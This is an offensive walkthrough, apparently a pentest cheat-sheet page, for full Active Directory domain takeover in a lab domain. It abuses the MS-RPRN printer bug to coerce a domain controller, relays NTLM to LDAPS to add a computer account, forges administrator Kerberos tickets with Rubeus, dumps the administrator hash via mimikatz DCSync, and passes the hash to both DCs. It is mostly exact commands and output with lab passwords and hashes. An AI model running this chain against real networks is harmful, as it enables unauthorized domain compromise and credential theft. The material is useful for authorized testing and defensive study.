PrinterBug (MS-RPRN abuse)

Triggers RPC call using SpoolService bug.

Installation

Make sure you have installed Impacket and download printerbug.py.

Step 1 - Is printspooler enabled?

$ cme smb 10.10.20.52 -u crypt0rr -p Welkom1234 -M spooler
SMB         10.10.20.52     445    DC02             [*] Windows 10.0 Build 17763 x64 (name:DC02) (domain:offsec.nl) (signing:True) (SMBv1:False)
SMB         10.10.20.52     445    DC02             [+] offsec.nl\crypt0rr:Welkom1234 
SPOOLER     10.10.20.52     445    DC02             Spooler service enabled

Step 2 - Start ntlmrelayx.py

The target (-t) should be another Domain Controller than the DC used for triggering.

$ sudo ntlmrelayx.py -t ldaps://dc03.offsec.nl --delegate-access --remove-mic -smb2support --no-validate-privs
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

Step 3 - Trigger Printerbug

Authentication @10.10.20.52 is the DC checked in step 1. The system at 10.10.20.10 is the IP running ntlmrelayx.py from step 2.

$ python3 printerbug.py 'offsec.nl'/'crypt0rr':'Welkom1234'@10.10.20.52 10.10.20.10
[*] Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Attempting to trigger authentication via rprn RPC at 10.10.20.52
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

If all goes as expected the following will be performed by ntlmrelayx.py.

[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 10.10.20.10, attacking target ldaps://dc03.offsec.nl
[*] Authenticating against ldaps://dc03.offsec.nl as OFFSEC/DC02$ SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[-] Cannot perform ACL escalation because we do not have create user privileges. Specify a user to assign privileges to with --escalate-user
[*] Attempting to create computer in: CN=Computers,DC=offsec,DC=nl
[*] SMBD-Thread-7: Connection from 10.10.20.10 controlled, but there are no more targets left!
[*] Adding new computer with username: JDIWKAKA$ and password: pU^Jj391_X6>b result: OK

A computer account JDIWKAKA$ with password pU^Jj391_X6>b is added to the domain.

Step 4 - Calculate RC4 from Password

PS Z:\> .\Rubeus.exe hash /password:pU^Jj391_X6>b

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : pU^Jj391_X6>b
[*]       rc4_hmac             : CC7EC46213E1EB105FFFC97F34AEAF64

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

Step 5 - Requesting TGT

PS Z:> .\Rubeus.exe asktgt /user:JDIWKAKA$ /domain:offsec.nl /rc4:CC7EC46213E1EB105FFFC97F34AEAF64

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: CC7EC46213E1EB105FFFC97F34AEAF64
[*] Building AS-REQ (w/ preauth) for: 'offsec.nl\JDIWKAKA$'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFfjCCBXqgAwIBBaEDAgEWooIElTCCBJF[...]mJ0Z3QbC3Byb2QuYmFtLm5s

  ServiceName              :  krbtgt/offsec.nl
  ServiceRealm             :  OFFSEC.NL
  UserName                 :  JDIWKAKA$
  UserRealm                :  OFFSEC.NL
  StartTime                :  02/05/2023 06:12:45
  EndTime                  :  02/05/2023 16:12:45
  RenewTill                :  09/05/2023 06:12:45
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  nmas9lybWx+91337H9Cw==
  ASREP (key)              :  94D178D478713374203D632D7B613B7

Step 6 - Impersonate CIFS/LDAP Tickets

LDAP

PS Z:\> .\Rubeus.exe s4u /ticket:doIFfjCCBXqgAwIBBaEDAgEWooIElTCCBJF[...]mJ0Z3QbC3Byb2QuYmFtLm5s /impersonateuser:administrator /msdsspn:LDAP/dc03.offsec.nl /dc:10.10.20.53 /ptt

[*] Action: S4U

[*] Using domain controller: 10.10.20.53
[*] Building S4U2self request for: 'JDIWKAKA$@OFFSEC.NL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'JDIWKAKA$@OFFSEC.NL'
[*] base64(ticket.kirbi):

      doIGxjCCBsKgAwIBB[...]1ZKWVJUJA==

[*] Impersonating user 'administrator' to target SPN 'LDAP/dc03.offsec.nl'
[*] Using domain controller: 10.10.20.53
[*] Building S4U2proxy request for service: 'LDAP/dc03.offsec.nl'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'LDAP/dc03.offsec.nl':

      doIFfjCCBXqgAwIBBaEDAgEWooIElTCCBJF[...]mJ0Z3QbC3Byb2QuYmFtLm5s

[+] Ticket successfully imported!

CIFS

PS Z:\> .\Rubeus.exe s4u /ticket:doIFfjCCBXqgAwIBBaEDAgEWooIElTCCBJF[...]mJ0Z3QbC3Byb2QuYmFtLm5s /impersonateuser:administrator /msdsspn:CIFS/dc03.offsec.nl /dc:10.10.20.53 /ptt

[*] Action: S4U

[*] Using domain controller: 10.10.20.53
[*] Building S4U2self request for: 'JDIWKAKA$@OFFSEC.NL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'JDIWKAKA$@OFFSEC.NL'
[*] base64(ticket.kirbi):

      doIGxjCCBsKgAwIBB[...]1ZKWVJUJA==

[*] Impersonating user 'administrator' to target SPN 'CIFS/dc03.offsec.nl'
[*] Using domain controller: 10.10.20.53
[*] Building S4U2proxy request for service: 'CIFS/dc03.offsec.nl'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/dc03.offsec.nl':

      doIFfjCCBXqgAwIBBaEDAgEWooIElTCCBJF[...]mJ0Z3QbC3Byb2QuYmFtLm5s
      
[+] Ticket successfully imported!

Check Kerberos Tray

PS Z:\> klist

Current LogonId is 0:0x51ac9

Cached Tickets: (2)

#0>     Client: administrator @ OFFSEC.NL
        Server: LDAP/dc03.offsec.nl @ OFFSEC.NL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 5/2/2023 6:30:26 (local)
        End Time:   5/2/2023 16:12:45 (local)
        Renew Time: 5/9/2023 6:12:45 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

#1>     Client: administrator @ OFFSEC.NL
        Server: CIFS/dc03.offsec.nl @ OFFSEC.NL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 5/2/2023 6:27:25 (local)
        End Time:   5/2/2023 16:12:45 (local)
        Renew Time: 5/9/2023 6:12:45 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

To validate if the CIFS is working with elevated (remote Administrator privileges) on the target machine, for example use the following dir \\WIN10-TARGET.offsec.nl\c$.

Step 7 - Dump NTLM hash

PS Z:\> .\mimikatz.exe

mimikatz # lsadump::dcsync /domain:offsec.nl /user:administrator@offsec.nl /dc:dc03.offsec.nl
[DC] 'offsec.nl' will be the domain
[DC] 'dc03.offsec.nl' will be the DC server
[DC] 'administrator@offsec.nl' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : administrator (SVC)

** SAM ACCOUNT **

SAM Username         : administrator
User Principal Name  : administrator@offsec.nl
[...]
Credentials:
  Hash NTLM: 97f2592347d8fbe42be381726ff9ea83
[...]

Step 8 - Pass the Hash

$ cme smb 10.10.20.52-53 -u administrator -H 97f2592347d8fbe42be381726ff9ea83
SMB         10.10.20.52     445    DC02             [*] Windows 10.0 Build 17763 x64 (name:DC02) (domain:offsec.nl) (signing:True) (SMBv1:False)
SMB         10.10.20.53     445    DC03             [*] Windows 10.0 Build 20348 x64 (name:DC03) (domain:offsec.nl) (signing:True) (SMBv1:False)
SMB         10.10.20.52     445    DC02             [+] offsec.nl\administrator:97f2592347d8fbe42be381726ff9ea83 (Pwn3d!)
SMB         10.10.20.53     445    DC03             [+] offsec.nl\administrator:97f2592347d8fbe42be381726ff9ea83 (Pwn3d!)

URL list